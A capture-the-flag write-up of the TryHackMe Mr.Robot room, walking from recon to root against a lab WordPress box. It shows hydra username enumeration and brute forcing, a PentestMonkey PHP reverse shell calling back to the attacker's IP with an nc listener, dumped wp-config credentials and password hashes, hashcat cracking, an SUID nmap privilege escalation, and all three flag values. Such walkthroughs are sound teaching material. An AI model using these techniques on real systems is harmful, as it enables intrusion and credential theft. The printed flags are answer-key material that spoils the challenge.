Mr.Robot
Nmap
1
2
3
4
5
6
7
8
9
| Nmap scan report for 10.10.49.229
Host is up (0.17s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Read data files from: /usr/bin/../share/nmap
|
Recon
Port 80
Wordpress Website
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| └─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.49.229/ -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.49.229/
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/10/05 13:15:22 Starting gobuster
===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ more wpscan.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.49.229/ [10.10.49.229]
[+] Started: Tue Oct 5 13:26:11 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.49.229/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.49.229/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] The external WP-Cron seems to be enabled: http://10.10.49.229/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.49.229/2742d2a.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.49.229/2742d2a.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.49.229/wp-content/themes/twentyfifteen/
| Latest Version: 3.0
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.49.229/wp-content/themes/twentyfifteen/readme.txt
| Style URL: http://10.10.49.229/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs -: |=============================================================================================================================================================================================================================|
[i] No Users Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 5 13:26:16 2021
[+] Requests Done: 12
[+] Cached Requests: 54
[+] Data Sent: 2.692 KB
[+] Data Received: 11.836 KB
[+] Memory used: 252.785 MB
[+] Elapsed time: 00:00:05
|
Robots.txt file
1
2
3
4
5
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ curl "http://10.10.49.229/robots.txt"
User-agent: *
fsocity.dic
key-1-of-3.txt
|
Key - 1
1
2
3
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ curl "http://10.10.49.229/key-1-of-3.txt"
073403c8a58a1f80d943455fb30724b9
|
Let’s download the dictionary file may be used for bruteforce for wordpress
Searching for username using hydra
1
2
3
4
5
6
7
8
9
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ hydra -L fsocity.dic -p test 10.10.49.229 http-post-form "/wp-login.php?action=lostpassword:user_login=^USER^&wp-submit=Get+New+Password:Invalid username"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-05 13:57:53
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://10.10.49.229:80/wp-login.php?action=lostpassword:user_login=^USER^&wp-submit=Get+New+Password:Invalid username
[80][http-post-form] host: 10.10.49.229 login: Elliot password: test
|
Error Code for password : ERROR: The password you entered for the
Bruteforce for password
1
2
3
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ wpscan --url http://10.10.49.229 -U Elliot -P fsocity.dic
|
After a long wait with bruteforce
1
2
| user: Elliot
pass: ER28-0652
|
User
Logging into the wordpress.
Uploading the reverse shell payload, in this case I am using PentestMonkey Reverse shell payload
1
2
3
4
5
6
7
8
9
10
11
| set_time_limit (0);
$VERSION = "1.0";
$ip = '10.17.27.83'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
-----<TRIM>----
|
After uploading the contents of the shell in the editor, Access the main page. You shall have a reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| └─$ nc -lvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.49.229 54163
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
08:48:27 up 1:06, 0 users, load average: 1.07, 1.41, 1.37
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@linux:/$
|
Upgrading the shell
Upon scrolling through the directories of hosted Apache Wordpress Server, found an wordpress config file with credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');
/** MySQL database username */
define('DB_USER', 'bn_wordpress');
/** MySQL database password */
define('DB_PASSWORD', '570fd42948');
/** MySQL hostname */
define('DB_HOST', 'localhost:3306');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
<<TRIMMED>>
define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);
|
1
2
3
4
5
6
7
8
| mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| mich05654 | $P$BpmKcWWjgC3/UGtj/fO36PsCxYC2E51 |
| elliot | $P$BHh01ohuhaRcy2EAC6ad//vTQ1eMwe. |
+------------+------------------------------------+
2 rows in set (0.00 sec)
|
1
2
3
4
5
6
7
8
9
10
11
| daemon@linux:/home/robot$ pwd
pwd
/home/robot
daemon@linux:/home/robot$ ls -rlta
ls -rlta
total 16
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
daemon@linux:/home/robot$
|
1
2
3
4
| daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
|
Cracking the hash with hashcat
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(kali@kali)-[~/ctf/tryhackme/Mr.Robot]
└─$ hashcat -m 0 hash.txt /opt/rockyou.txt
hashcat (v6.0.0) starting...
Host memory required for this attack: 66 MB
Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
|
1
2
| user : robot
pass : abcdefghijklmnopqrstuvwxyz
|
Logging as robot
1
2
3
4
5
6
7
8
| daemon@linux:/home/robot$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ python -c 'import pty;pty.spawn("/bin/bash")'
robot@linux:~$
|
Key 2
1
2
3
| robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
|
Root
Uploaded Linpeas to the box and found an interesting suid for nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| [+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Feb 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 41K Feb 17 2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 32K Feb 17 2014 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 37K Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 10K Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 431K May 12 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 68K Feb 12 2015 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 93K Feb 12 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 11K Feb 25 2015 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 152K Mar 12 2015 /usr/bin/sudo ---> /sudo$
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
-r-sr-xr-x 1 root root 9.4K Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
|
https://gtfobins.github.io/gtfobins/nmap/#suid
1
2
3
| TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| robot@linux:/dev/shm$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# ls -rlta
ls -rlta
total 32
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 1024 Sep 16 2015 .rnd
-rw-r--r-- 1 root root 3274 Sep 16 2015 .bashrc
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
drwx------ 2 root root 4096 Nov 13 2015 .cache
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
drwx------ 3 root root 4096 Nov 13 2015 .
-rw------- 1 root root 4058 Nov 14 2015 .bash_history
|
Key 3
1
2
| cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
|